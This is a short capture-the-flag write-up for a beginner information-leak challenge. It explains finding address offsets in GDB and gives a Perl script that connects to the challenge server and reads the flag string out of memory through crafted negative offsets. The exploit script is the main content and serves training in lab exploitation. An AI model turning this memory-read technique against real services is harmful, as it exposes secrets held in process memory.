Task:

<span>Baby's first infoleak (do you even really need the binary?) (https://en.wikipedia.org/wiki/Information_leakage)
Server: 172.31.1.36:1616
Binary: 172.31.0.10/tyro_infoleak1_bdc3f08dab986b30317b0937a096d794

Approach:

The binary provided options to see the contents of a memory address using a relative offset or an absolute address. In GDB we found that offset 0 was the starting address for relative offsets and offset 4 was the address of the flag string.

A simple perl script was written to read the flag using relative offsets between the two addresses and walking upwards. This script corrupted the last two bytes of output, but it was trivial to manually correct the result.

</span>#!/usr/bin/perl

use IO::Socket::INET;

$sock = IO::Socket::INET->new(PeerAddr => '172.31.1.36',
                              PeerPort => 1616,
                              Proto    => 'tcp');

sleep(1);
my $linebuf;
$sock->send("1\n0\n1\n4\n");
sleep(1);
$sock->recv($linebuf, 4096);
print $linebuf;

my $decoded = '';
if ($linebuf =~ /0x(\S\S\S\S\S\S\S\S).*0x(\S\S\S\S\S\S\S\S)/s) {
    my ( $stack, $string) = ($1, $2);
    my $offset = hex($stack) - hex($string);
    printf "Offset: %08x, %08x, %08x\n", hex($stack), hex($string), $offset;
    my $walker = "";
    foreach my $cur_bucket (0, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48, 52) {
        my $current = sprintf("1\n-%08x\n", ($offset - $cur_bucket));
        print "Sending offset: $cur_bucket\n";
        $sock->send($current);
        sleep(1);
        $sock->recv($linebuf, 4096);
        print "$linebuf";
        if ($linebuf =~ /0x(\S\S\S?\S?\S?\S?\S?\S?)/) {
            my $val = $1;
            my $temp = '';
            while ($val =~ /(..)/g) { $temp .= chr(hex($1))}
            $decoded .= reverse($temp);
        }
    }
}

print "Decoded: $decoded\n";